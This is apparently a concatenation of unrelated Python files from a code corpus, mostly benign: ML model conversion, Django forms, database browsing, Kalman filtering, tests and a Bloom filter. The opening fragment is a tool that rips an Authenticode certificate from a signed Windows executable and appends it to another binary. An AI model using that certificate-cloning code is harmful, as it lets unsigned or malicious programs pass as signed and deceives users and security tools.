# Begin Standard Fields section of Optional Header
binary.seek(self.target_info['OptionalHeader_start'])
self.target_info['Magic'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
self.target_info['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
self.target_info['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
self.target_info['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
self.target_info['SizeOfUninitializedData'] = struct.unpack("<I",
binary.read(4))[0]
self.target_info['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['PatchLocation'] = self.target_info['AddressOfEntryPoint']
self.target_info['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
if self.target_info['Magic'] != 0x20B:
self.target_info['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if self.target_info['Magic'] == 0x20B:
self.target_info['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
else:
self.target_info['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['MajorOperatingSystemVersion'] = struct.unpack('<H',
binary.read(2))[0]
self.target_info['MinorOperatingSystemVersion'] = struct.unpack('<H',
binary.read(2))[0]
self.target_info['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['SizeOfImageLoc'] = binary.tell()
self.target_info['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
if self.target_info['Magic'] == 0x20B:
self.target_info['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
self.target_info['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
self.target_info['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
self.target_info['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
else:
self.target_info['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0] # zero
self.target_info['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
self.target_info['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['ImportTableLOCInPEOptHdrs'] = binary.tell()
# ImportTable SIZE|LOC
self.target_info['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
self.target_info['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
self.target_info['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
self.target_info['CertTableLOC'] = binary.tell()
self.target_info['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
self.target_info['CertSize'] = struct.unpack("<I", binary.read(4))[0]
if self.debug:
Console.auto_line(f"[+] Information successfully recovered")
def copy_cert(self, signee):
self.__gather_file_info_win(signee)
if self.target_info['CertLOC'] == 0 or self.target_info['CertSize'] == 0:
# not signed
Console.auto_line("[-] Input file Not signed!")
sys.exit(-1)
with open(signee, 'rb') as f:
f.seek(self.target_info['CertLOC'], 0)
self.certificate = f.read(self.target_info['CertSize'])
def sign(self, signee, signed):
self.__gather_file_info_win(signee)
if not self.certificate:
self.copy_cert(signee)
if self.debug:
Console.auto_line("[*] Output file: {0}".format(signed))
with open(signee, 'rb') as g:
with open(signed, 'wb') as f:
f.write(g.read())
f.seek(0)
f.seek(self.target_info['CertTableLOC'], 0)
f.write(struct.pack("<I", len(open(signee, 'rb').read())))
f.write(struct.pack("<I", len(self.certificate)))
f.seek(0, io.SEEK_END)
f.write(self.certificate)
if self.debug:
Console.auto_line("[+] Signature successfully appended")
self.clean()
def save_cert(self, exe):
if not self.certificate:
self.copy_cert(exe)
if self.debug:
Console.auto_line("[*] Output file: {0}".format(self.certificate_file))
with open(self.certificate_file, 'wb') as c_out:
c_out.write(self.certificate)
if self.debug:
Console.auto_line("[+] Signature ripped")
def check_sig(self, signed):
self.__gather_file_info_win(signed)
if self.target_info['CertLOC'] == 0 or self.target_info['CertSize'] == 0:
# not signed
Console.auto_line("[-] File not signed!")
return False
else:
Console.auto_line("[+] File is signed!")
return True
def truncate(self, signed, unsigned):
if not self.check_sig(signed):
sys.exit(-1)
shutil.copy2(signed, unsigned)
with open(unsigned, "r+b") as binary:
if self.debug:
Console.auto_line('[*] Overwriting certificate table pointer and truncating binary')
binary.seek(-self.target_info['CertSize'], io.SEEK_END)
binary.truncate()
binary.seek(self.target_info['CertTableLOC'], 0)
binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
if self.debug:
Console.auto_line("[+] Signature removed")
def sign_with(self, certificate, signee, signed):
self.certificate = open(certificate, 'rb').read()
self.sign(signee, signed)
| StarcoderdataPython |
107048 | import os
import caffe
import numpy as np
import skimage
import tensorflow as tf
from Preprocessor import Preprocessor
from datasets.ImageNet import ImageNet
from models.AlexNetConverter import AlexNetConverter
from models.SDNet import SDNet
from train.SDNetTrainer import SDNetTrainer
im_s = 227
def preprocess(img):
out = np.copy(img)
out = out[:, :, [2, 1, 0]] # swap channel from RGB to BGR
out = out.transpose((2, 0, 1)) # h, w, c -> c, h, w
return out
def load_image(path):
# load image
img = np.float32(skimage.io.imread(path))
img /= 127.5
img -= 1.0
# we crop image from center
short_edge = min(img.shape[:2])
yy = int((img.shape[0] - short_edge) / 2)
xx = int((img.shape[1] - short_edge) / 2)
crop_img = img[yy: yy + short_edge, xx: xx + short_edge]
# resize to 224, 224
resized_img = skimage.transform.resize(crop_img, (im_s, im_s))
return resized_img
model = SDNet(num_layers=5, target_shape=[im_s, im_s, 3], batch_size=16, disc_pad='VALID')
data = ImageNet()
preprocessor = Preprocessor(target_shape=[im_s, im_s, 3])
trainer = SDNetTrainer(model=model, dataset=data, pre_processor=preprocessor, num_epochs=80, tag='refactored',
lr_policy='const', optimizer='adam')
model_dir = '../test_converter'
proto_path = 'deploy.prototxt'
ckpt = '../test_converter/model.ckpt-800722'
save_path = os.path.join(model_dir, 'alexnet_v2.caffemodel')
np.random.seed(42)
img = load_image('cat.jpg')
converter = AlexNetConverter(model_dir, model, trainer.sess, ckpt=ckpt, remove_bn=True, scale=1.0, bgr=True,
im_size=(im_s, im_s), with_fc=False, use_classifier=False)
with converter.sess:
converter.extract_and_store()
net, encoded = model.discriminator.encode(tf.constant(img, shape=[1, im_s, im_s, 3], dtype=tf.float32),
with_fc=converter.with_fc, reuse=True, training=False)
result_tf = encoded.eval()
converter.load_and_set_caffe_weights(proto_path=proto_path, save_path=save_path)
# Testing
net_caffe = caffe.Net(proto_path, save_path, caffe.TEST)
net_caffe.blobs['data'].data[0] = preprocess(img)
assert net_caffe.blobs['data'].data[0].shape == (3, im_s, im_s)
net_caffe.forward()
result_caffe = net_caffe.blobs['Convolution5'].data[0]
result_caffe = result_caffe.transpose((1, 2, 0)) # h, w, c -> c, h, w
print(np.linalg.norm(result_tf - result_caffe))
| StarcoderdataPython |
1658155 | <filename>BackEnd/api/service/user_search.py
def build_user_search_schema(user_search):
mod = {}
mod['search_subject'] = user_search.search_subject
mod['search_id'] = user_search.search_id
return mod
| StarcoderdataPython |
1749976 | <reponame>codescribblr/project-manager-django3<filename>vapor_manager/users/forms.py
from django.contrib.auth import forms, get_user_model
User = get_user_model()
class UserChangeForm(forms.UserChangeForm):
class Meta(forms.UserChangeForm.Meta):
model = User
class UserCreationForm(forms.UserCreationForm):
class Meta(forms.UserCreationForm.Meta):
model = User
fields = ("email",)
field_classes = {}
| StarcoderdataPython |
3350302 | # The Admin4 Project
# (c) 2013-2014 <NAME>
#
# Licensed under the Apache License,
# see LICENSE.TXT for conditions of usage
from _objects import ServerObject, DatabaseObject
from wh import xlt, YesNo
class Database(ServerObject):
typename=xlt("Database")
shortname=xlt("Database")
@staticmethod
def GetInstances(parentNode):
instances=[]
params={'sysrestr': " WHERE d.oid > %s" % parentNode.GetServer().GetLastSysOid() }
set=parentNode.GetCursor().ExecuteSet("""
SELECT d.*, pg_encoding_to_char(encoding) AS pgencoding, pg_get_userbyid(datdba) AS dbowner, spcname, d.oid, description
FROM pg_database d
JOIN pg_tablespace t ON t.oid=dattablespace
LEFT JOIN pg_shdescription des ON des.objoid=d.oid
%(sysrestr)s
ORDER BY datname
""" % params)
if set:
for row in set:
if not row:
break
instances.append(Database(parentNode, row['datname'], row.getDict()))
for db in instances:
db.favourites=db.GetServer().GetFavourites(db)
return instances
def __init__(self, parentNode, name, info):
super(Database, self).__init__(parentNode, name)
self.info=info
def GetDatabase(self):
return self
def GetIcon(self):
icons=[]
if self.IsConnected():
icons.append("Database-conn")
else:
icons.append("Database-noconn")
if self.IsMaintenanceConnection():
icons.append("pg")
return self.GetImageId(icons)
def IsMaintenanceConnection(self):
return self.name == self.GetServer().maintDb
def IsConnected(self):
if self.IsMaintenanceConnection():
return self.GetServer().IsConnected()
return self.connection != None
def DoConnect(self):
return self.GetServer().DoConnect(self.name)
def FindObject(self, patterns, schemaOid, kind=None):
"""
FindObject(patterns, schemaOid, kind)
Finds all objects matching the pattern list
if patterns[0] includes a dot, schemaOid is overridden
"""
# relkind: r = ordinary table, i = index, S = sequence, v = view, m = materialized view,
# c = composite type, t = TOAST table, f = foreign table
# P=Proc
queries=[]
if len(patterns) > 1:
type=patterns[0]
patterns=patterns[1:]
else:
type=None
dp=patterns[0].find('.')
if dp>0:
schemaName=patterns[0][:dp]
patterns[0]=patterns[0][dp+1:]
else:
schemaName=None
for ni in self.moduleinfo()['nodes'].values():
cls=ni['class']
if hasattr(cls, 'FindQuery'):
if not kind or kind == cls.relkind:
sql=cls.FindQuery(schemaName, schemaOid, patterns)
queries.append(sql.SelectQueryString())
result=self.GetCursor().ExecuteDictList("%s\n\nORDER BY 1, 2, 3" % "\nUNION\n".join(queries))
return result
def GetConnection(self):
if self.IsMaintenanceConnection():
return self.GetServer()
if not self.connection:
self.connection = self.DoConnect()
self.IconUpdate(True)
self.properties=[]
else:
self.CheckConnection(self.connection)
return self.connection
def GetCursor(self):
conn=self.GetConnection()
if conn:
return conn.GetCursor()
return None
def DoDisconnect(self):
self.connection.Disconnect()
self.connection = None
self.IconUpdate(True)
def GetProperties(self):
if not len(self.properties):
dict=self.GetCursor().ExecuteDict("""
SELECT 'languages', array_agg(lanname) as lannames
FROM (SELECT lanname FROM pg_language ORDER BY lanispl desc, lanname) AS langlist""")
self.info.update(dict)
if self.GetServer().version >= 9.1:
dict=self.GetCursor().ExecuteDict("""
SELECT 'extensions', array_agg(name) as extnames
FROM (SELECT extname || ' V' || extversion AS name FROM pg_extension ORDER BY extname) AS extlist
UNION
SELECT 'available_extensions', array_agg(name) as extnames
FROM (SELECT name || ' V' || default_version AS name FROM pg_available_extensions WHERE installed_version is null ORDER BY name) AS avextlist
""")
self.info.update(dict)
self.properties = [
(xlt("Name"), self.name),
( "OID" , self.info['oid']),
(xlt("Owner"), self.info['dbowner']),
(xlt("Tablespace"), self.info['spcname']),
(xlt("Encoding"), self.info['pgencoding']),
(xlt("Connected"), YesNo(self.IsConnected())),
]
self.AddProperty(xlt("Backend PID"), self.GetCursor().GetPid())
if self.info['datistemplate']:
self.AddYesNoProperty(xlt("Template"), True)
if 'datctype' in self.info:
self.AddProperty(xlt("Collate"), self.info['datcollate'])
self.AddProperty(xlt("CType"), self.info['datctype'])
self.AddProperty(xlt("Languages"), ", ".join(self.info['languages']))
ext=self.info.get('extensions')
if ext != None:
if ext:
ext=", ".join(ext)
self.AddProperty(xlt("Installed Extensions"), ext)
avext=self.info.get('available_extensions')
if avext:
avext=", ".join(avext)
self.AddProperty(xlt("Available Extensions"), avext)
self.AddProperty(xlt("Description"), self.info['description'])
return self.properties
class Programming(DatabaseObject):
typename="Programming"
shortname="Programming"
@staticmethod
def GetInstances(parentNode):
instances=[Programming(parentNode, "")]
return instances
def GetProperties(self):
return []
nodeinfo= [ { "class": Database, "parents": ["Server"], "sort": 30, "pages": "SqlPage" },
# { 'class': Programming, 'parents': Database, 'sort': 50 }
]
class DbDisconnect:
name=xlt("Disconnect")
help=xlt("Disconnect database connection")
@staticmethod
def CheckEnabled(node):
return node.connection != None
@staticmethod
def OnExecute(_parentWin, node):
node.DoDisconnect()
menuinfo=[
{"class": DbDisconnect, "nodeclasses": Database , "sort": 1 } ,
]
| StarcoderdataPython |
4834354 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module contains unit tests of the arc.job.job module
"""
from __future__ import (absolute_import, division, print_function, unicode_literals)
import unittest
import os
import datetime
from arc.job.job import Job
from arc.settings import arc_path
################################################################################
class TestJob(unittest.TestCase):
"""
Contains unit tests for the Job class
"""
@classmethod
def setUpClass(cls):
"""
A method that is run before all unit tests in this class.
"""
cls.maxDiff = None
ess_settings = {'gaussian': ['server1','server2'], 'molpro': ['server2'], 'qchem': ['server1'], 'ssh': False}
cls.job1 = Job(project='project_test', ess_settings=ess_settings, species_name='tst_spc', xyz='C 0.0 0.0 0.0',
job_type='opt', level_of_theory='b3lyp/6-31+g(d)', multiplicity=1, testing=True,
project_directory=os.path.join(arc_path, 'Projects', 'project_test'), fine=True, job_num=100)
cls.job1.initial_time = datetime.datetime(2019, 3, 15, 19, 53, 7, 0)
cls.job1.final_time = datetime.datetime(2019, 3, 15, 19, 53, 8, 0)
cls.job1.determine_run_time()
def test_as_dict(self):
"""Test Job.as_dict()"""
job_dict = self.job1.as_dict()
initial_time = job_dict['initial_time']
final_time = job_dict['final_time']
expected_dict = {'initial_time': initial_time,
'final_time': final_time,
'run_time': 1.0,
'ess_trsh_methods': [],
'trsh': '',
'initial_trsh': {},
'fine': True,
'job_id': 0,
'job_name': 'opt_a100',
'job_num': 100,
'job_server_name': 'a100',
'job_status': ['initializing', 'initializing'],
'job_type': 'opt',
'level_of_theory': 'b3lyp/6-31+g(d)',
'memory': 1500,
'occ': None,
'pivots': [],
'project_directory': os.path.join(arc_path, 'Projects', 'project_test'),
'scan': '',
'server': None,
'shift': '',
'max_job_time': 120,
'comments': '',
'scan_res': 8.0,
'scan_trsh': '',
'software': 'gaussian',
'xyz': 'C 0.0 0.0 0.0'}
self.assertEqual(job_dict, expected_dict)
################################################################################
if __name__ == '__main__':
unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
| StarcoderdataPython |
3387047 | from math import sin, cos, tan, radians
ang = float(input("Digite um ângulo: "))
angr = radians(ang)
print(f'O seno de {ang} é {sin(angr):.2f}')
print(f'O cosseno de {ang} é {cos(angr):.2f}')
print(f'A tangente de {ang} é {tan(angr):.2f}') | StarcoderdataPython |
3397431 | <filename>lang/py/cookbook/v2/source/cb2_15_8_exm_2.py
IOR:010000001d00000049444c3a466f7274756e652f436f6f6b69655365727665723
a312e300000000001000000000000005c000000010102000d0000003135382e313234
2e36342e330000f90a07000000666f7274756e6500020000000000000008000000010
0000000545441010000001c0000000100000001000100010000000100010509010100
0100000009010100
| StarcoderdataPython |
32761 | <filename>src/kalman_filter.py
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import numpy as np
class kalman_filter:
# State : A column vector with [x_pos, y_pos, yaw, x_vel, y_vel]
def __init__(self, init_state, init_time, accel_var, yaw_var, meas_var):
self.state = np.asarray(init_state).reshape(5,1)
self.prev_time = init_time
self.covar = np.zeros((5,5))
self.Q = np.diag([accel_var, accel_var, yaw_var])
self.R = np.diag([meas_var, meas_var])
self.states = []
self.covars = []
# Input : A column vector with [x_accel, y_accel, yaw_vel]
def update(self, inp, time):
inp = np.asarray(inp).reshape(3,1)
dt = time - self.prev_time
# Transition matrix :
#
# | 1 0 0 dt 0 |
# | 0 1 0 0 dt |
# | 0 0 1 0 0 |
# | 0 0 0 1 0 |
# | 0 0 0 0 1 |
#
A = np.asarray([\
[1, 0, 0, dt,0], \
[0, 1, 0, 0, dt],\
[0, 0, 1, 0, 0], \
[0, 0, 0, 1, 0], \
[0, 0, 0, 0, 1] \
])
# Input influence matrix
#
# | 0 0 0 |
# | 0 0 0 |
# | 0 0 dt |
# | dt 0 0 |
# | 0 dt 0 |
#
B = np.asarray([\
[0, 0, 0], \
[0, 0, 0], \
[0, 0, dt],\
[dt,0, 0], \
[0, dt,0], \
])
# L = np.asarray([\
# [0, 0, 0,], \
# [0, 0, 0,], \
# [0, 0, 1,], \
# [1, 0, 0], \
# [0, 1, 0], \
# ])
yaw = self.state[2][0]
accel_xl = inp[0][0]
accel_yl = inp[1][0]
accel_xg = accel_xl * np.cos(yaw) - accel_yl * np.sin(yaw)
accel_yg = accel_xl * np.sin(yaw) + accel_yl * np.cos(yaw)
dxvel_dyaw = -dt * (inp[0][0] * np.sin(self.state[2][0]) + inp[1][0] * np.cos(self.state[2][0]))
dyvel_dyaw = dt * (inp[0][0] * np.cos(self.state[2][0]) - inp[1][0] * np.sin(self.state[2][0]))
dxvel_din1 = dt * np.cos(self.state[2][0])
dxvel_din2 = -dt * np.sin(self.state[2][0])
dyvel_din1 = dt * np.sin(self.state[2][0])
dyvel_din2 = dt * np.cos(self.state[2][0])
g_inp = np.asarray([accel_xg, accel_yg, inp[2][0]]).reshape(3,1)
# State updation with input
self.state = A.dot(self.state) + B.dot(g_inp)
#self.state = np.asarray([x_new, y_new, yaw_new, xvel_new, yvel_new]).reshape(5,1)
if(self.state[2][0] > np.pi):
self.state[2][0] = self.state[2][0] - 2 * np.pi
elif(self.state[2][0] < -np.pi):
self.state[2][0] = self.state[2][0] + 2 * np.pi
# x_new = self.state[0][0] + dt * self.state[3][0]
# y_new = self.state[1][0] + dt * self.state[4][0]
# yaw_new = self.state[2][0] + dt * inp[2][0]
# xvel_new = self.state[3][0] + dt * (inp[0][0] * np.cos(self.state[2][0]) - inp[1][0] * np.sin(self.state[2][0]))
# yvel_new = self.state[4][0] + dt * (inp[0][0] * np.sin(self.state[2][0]) + inp[1][0] * np.cos(self.state[2][0]))
A = np.asarray([\
[1, 0, 0, dt,0], \
[0, 1, 0, 0, dt],\
[0, 0, 1, 0, 0], \
[0, 0, dxvel_dyaw, 1, 0], \
[0, 0, dyvel_dyaw, 0, 1] \
])
B = np.asarray([\
[0, 0, 0], \
[0, 0, 0], \
[0, 0, dt],\
[dxvel_din1, dxvel_din2, 0], \
[dyvel_din1, dyvel_din2, 0], \
])
# Covariance update
self.covar = A.dot(self.covar.dot(A.T)) + B.dot(self.Q.dot(B.T))
# Append to trajectory
self.states.append([self.state, time, 0])
self.covars.append([self.covar, time, 0])
# Update previous time
self.prev_time = time
def measure(self, measurement, time):
# How to find expected measurement from state?
H = np.asarray([\
[1, 0, 0, 0, 0], \
[0, 1, 0, 0, 0], \
])
measurement = np.asarray(measurement).reshape(2,1)
# Error of measurement from expected measurement
V = measurement - H.dot(self.state)
S = H.dot(self.covar.dot(H.T)) + self.R
K = self.covar.dot(H.T.dot(np.linalg.inv(S)))
self.state = self.state + K.dot(V)
self.covar = self.covar - K.dot(S.dot(K.T))
# Append to trajectory
self.states.append([self.state, time, 1])
self.covars.append([self.covar, time, 1])
# Return position
def get_pos(self):
return (self.states[len(self.states)-1])
| StarcoderdataPython |
4815968 | import os
from pip._internal.req import parse_requirements
from setuptools import setup, find_packages
install_reqs = parse_requirements('requirements.txt', session=False)
reqs = [str(ir.req) for ir in install_reqs]
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name="emailme",
version="0.3.0",
author="<NAME>",
author_email="<EMAIL>",
description=("Super simple self-emailing."),
license="MIT",
packages=find_packages(),
keywords="email",
url="http://github.com/ericmjl/emailme",
package_data={'': ['README.md']},
install_requires=reqs,
long_description=read('README.md'),
long_description_content_type="text/markdown",
entry_points={'console_scripts': ['emailme=emailme.cli:cli']}
)
| StarcoderdataPython |
1758720 | import re
from factom_did.client.constants import DID_METHOD_NAME
from factom_did.client.enums import KeyType, Network
def validate_alias(alias):
if not re.match("^[a-z0-9-]{1,32}$", alias):
raise ValueError(
"Alias must not be more than 32 characters long and must contain only lower-case "
"letters, digits and hyphens."
)
def validate_did(did):
if not re.match(
"^{}:({}:|{}:)?[a-f0-9]{{64}}$".format(
DID_METHOD_NAME, Network.Mainnet.value, Network.Testnet.value
),
did,
):
raise ValueError("Controller must be a valid DID.")
def validate_full_key_identifier(did):
if not re.match(
"^{}:({}:|{}:)?[a-f0-9]{{64}}#[a-zA-Z0-9-]{{1,32}}$".format(
DID_METHOD_NAME, Network.Mainnet.value, Network.Testnet.value
),
did,
):
raise ValueError("Controller must be a valid DID.")
def validate_service_endpoint(endpoint):
if not re.match(
r"^(http|https):\/\/(\w+:{0,1}\w*@)?(\S+)(:[0-9]+)?(\/|\/([\w#!:.?+=&%@!\-\/]))?$",
endpoint,
):
raise ValueError(
"Endpoint must be a valid URL address starting with http:// or https://."
)
def validate_priority_requirement(priority_requirement):
if priority_requirement is not None and (
isinstance(priority_requirement, int) is False or priority_requirement < 0
):
raise ValueError("Priority requirement must be a non-negative integer.")
def validate_key_type(key_type):
if key_type not in (KeyType.ECDSA, KeyType.EdDSA, KeyType.RSA):
raise ValueError("Type must be a valid signature type.")
| StarcoderdataPython |
3378083 | from justgood import imjustgood
api = imjustgood("YOUR_APIKEY_HERE")
data = api.joox("lathi")
print(data)
# EXAMPLE GET CERTAIN ATTRIBUTES
result = "Singer : {}".format(data["result"]["singer"])
result += "\nTitle : {}".format(data["result"]["title"])
result += "\nDuration : {}".format(data["result"]["duration"])
result += "\nSize : {}".format(data["result"]["size"])
result += "\n\nThumbnail :\n{}".format(data["result"]["thumbnail"])
result += "\n\nM4a :\n{}".format(data["result"]["m4aUrl"])
result += "\n\nMp3 :\n{}".format(data["result"]["mp3Url"])
print(result)
| StarcoderdataPython |
50029 | import supriya.nonrealtime
def test_01():
session = supriya.nonrealtime.Session()
assert session.offsets == [float("-inf"), 0.0]
assert session.duration == 0.0
def test_02():
session = supriya.nonrealtime.Session()
with session.at(0):
session.add_group()
assert session.offsets == [float("-inf"), 0.0, float("inf")]
assert session.duration == 0.0
def test_03():
session = supriya.nonrealtime.Session()
with session.at(23.5):
session.add_group()
assert session.offsets == [float("-inf"), 0.0, 23.5, float("inf")]
assert session.duration == 23.5
def test_04():
session = supriya.nonrealtime.Session()
with session.at(23.5):
session.add_group(duration=1.0)
assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5]
assert session.duration == 24.5
def test_05():
session = supriya.nonrealtime.Session()
with session.at(0):
session.add_group()
with session.at(23.5):
session.add_group(duration=1.0)
assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5, float("inf")]
assert session.duration == 24.5
def test_06():
session = supriya.nonrealtime.Session(padding=11.0)
assert session.offsets == [float("-inf"), 0.0]
assert session.duration == 0.0
def test_07():
session = supriya.nonrealtime.Session(padding=11.0)
with session.at(0):
session.add_group()
assert session.offsets == [float("-inf"), 0.0, float("inf")]
assert session.duration == 0.0
def test_08():
session = supriya.nonrealtime.Session(padding=11.0)
with session.at(23.5):
session.add_group()
assert session.offsets == [float("-inf"), 0.0, 23.5, float("inf")]
assert session.duration == 34.5
def test_09():
session = supriya.nonrealtime.Session(padding=11.0)
with session.at(23.5):
session.add_group(duration=1.0)
assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5]
assert session.duration == 35.5
def test_10():
session = supriya.nonrealtime.Session(padding=11.0)
with session.at(0):
session.add_group()
with session.at(23.5):
session.add_group(duration=1.0)
assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5, float("inf")]
assert session.duration == 35.5
| StarcoderdataPython |
1764793 | <gh_stars>1-10
import path_utils
from Evolve import Evolve
#e = Evolve('MountainCar-v0', NN='FFNN_multilayer')
#e = Evolve('CartPole-v0', NN='FFNN', search_method='bin_grid_search')
e = Evolve('MountainCar-v0', NN='FFNN', search_method='sparse_bin_grid_search')
#e = Evolve('MountainCar-v0', NN='FFNN')
evo_dict = e.evolve(20000, N_trials=3)
e.plot_scores(evo_dict, show_plot=True)
e.show_best_episode(evo_dict['best_weights'])
| StarcoderdataPython |
3740 | import math
from sys import exit
# итак, n - приблизительное число элементов в массиве, P - вероятность ложноположительного ответа, тогда размер
# структуры m = -(nlog2P) / ln2 (2 - основание), количество хеш-функций будет равно -log2P
# хеш-функции используются вида: (((i + 1)*x + p(i+1)) mod M) mod m,где - x - ключ, i - номер хэш-функции,
# pi - i-тое по счету простое число, а M - 31ое число Мерсенна, M = 2^31 - 1, M = 2 147 483 647, M - простое число.
# При подсчёте хеш-функций необходимо знать первые k простых чисел. Посчитаем их один раз в конструкторе BloomFilter
# и будем хранить в структуре данных.
# Также нам необходимо создать битовый массив размера m, однако по умолчанию в питоне битовый массив отсутствует,
# поэтому будем использовать байтовый массив. Реализуем для удобства отдельную СД, из методов необходимо: изменить
# указанный бит на 1, проверить является ли указанный бит 1 и напечатать (вернуть) сам массив
Mersen_31 = 2147483647
class BitArray:
def __init__(self, size):
self.__array = bytearray(int(math.ceil(size / 8)))
self.__size = size
def add_bit(self, i):
# i-тый бит содержится в i//8 байте на i % 8 месте
self.__array[i // 8] |= 2 ** (7 - (i % 8))
def check_bit(self, i):
if (self.__array[i // 8] & (2 ** (7 - (i % 8)))) == 0:
return False
else:
return True
def print(self):
array_str = ""
for byte in self.__array:
_line = str(bin(byte))[2:]
if len(_line) != 8:
_line = '0' * (8 - len(_line)) + _line
array_str += _line
return array_str[:self.__size]
class BloomFilter:
def __init__(self, n: int, p: float):
self.size = int(-round(n * math.log2(p) / math.log(2)))
self.hash_numbers = int(-round(math.log2(p)))
self.__prime_numbers = list()
self.__get_prime(self.hash_numbers + 1)
self.__bitarray = BitArray(self.size)
def __get_prime(self, prime_size):
# обычный проход по всем числам и их проверка на простоту - сложно по времени
# немного упростим: во-первых будем идти с интервалом 2, начиная от 3, а после новое число проверять на
# делимость на уже найденные простые числа (кроме двойки, мы же рассматриваем нечётные)
if prime_size == 1:
self.__prime_numbers.append(2)
return
self.__prime_numbers.append(2)
i = 3
while len(self.__prime_numbers) < prime_size:
j = 1
prime_flag = True
while j < len(self.__prime_numbers):
if (i % self.__prime_numbers[j]) == 0:
prime_flag = False
break
j += 1
if prime_flag:
self.__prime_numbers.append(i)
i += 2
def __get_hash(self, x, i):
return (((i + 1) * x + self.__prime_numbers[i]) % Mersen_31) % self.size
def add(self, key: int):
i = 0
while i < self.hash_numbers:
self.__bitarray.add_bit(self.__get_hash(key, i))
i += 1
def search(self, key: int):
i = 0
while i < self.hash_numbers:
if not self.__bitarray.check_bit(self.__get_hash(key, i)):
return False
i += 1
return True
def print(self):
return self.__bitarray.print()
bloom_filter = 0
while True:
try:
line = input().split()
if len(line) == 0:
continue
else:
if line[0] == "set":
try:
elements_number = int(line[1])
probability = float(line[2])
if (elements_number <= 0) | (probability <= 0) | (probability >= 1):
print("error")
continue
bloom_filter = BloomFilter(elements_number, probability)
if (bloom_filter.size == 0) | (bloom_filter.hash_numbers == 0):
print("error")
continue
break
except TypeError:
print("error")
continue
else:
print("error")
continue
except EOFError:
exit()
print(bloom_filter.size, bloom_filter.hash_numbers)
while True:
try:
line = input().split()
if len(line) == 0:
continue
elif line[0] == "print":
print(bloom_filter.print())
elif (line[0] == "add") & (line[1].isnumeric()):
bloom_filter.add(int(line[1]))
elif (line[0] == "search") & (line[1].isnumeric()):
print(int(bloom_filter.search(int(line[1]))))
else:
print("error")
except EOFError:
break
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.